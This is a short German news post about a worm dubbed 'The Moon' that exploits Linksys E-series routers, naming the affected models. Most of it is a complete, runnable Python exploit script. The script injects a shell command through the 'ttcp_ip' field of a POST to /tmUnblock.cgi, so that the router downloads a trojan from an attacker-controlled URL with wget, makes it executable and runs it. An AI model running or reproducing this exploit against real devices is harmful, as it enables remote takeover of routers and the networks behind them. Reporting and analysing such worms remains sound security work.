Linksys-Router mit Wurmbefall

linksysWie das Internet Storm Center (SANS Institute) berichtet, verbreitet sich ein Wurm über eine Sicherheitslücke in Linksys-Routern.
Die Router der Serien E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900 sind betroffen.

Ein Exploit Code für die E-Serie wurde veröffentlicht.

Der Wurm wurde "The Moon" getauft und verwendet folgenden Code:

import requests
import sys

def banner():
    print """\x1b[0;32m
.____    .__        __                          
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/ 
       You are the weakest link. Goodbye.
Linksys remote root – infodox – Insecurety Research.
Version 2: Crippled (wget shelldrop only)
    \x1b[0m"""

def upShell(wget_url, target):
""" This works with the normal busybox wget at least, and worked in testing"""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"

def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '', 
                  'action': '', 
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)

def main(args):
    banner()
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])

if __name__ == "__main__":
    main(sys.argv)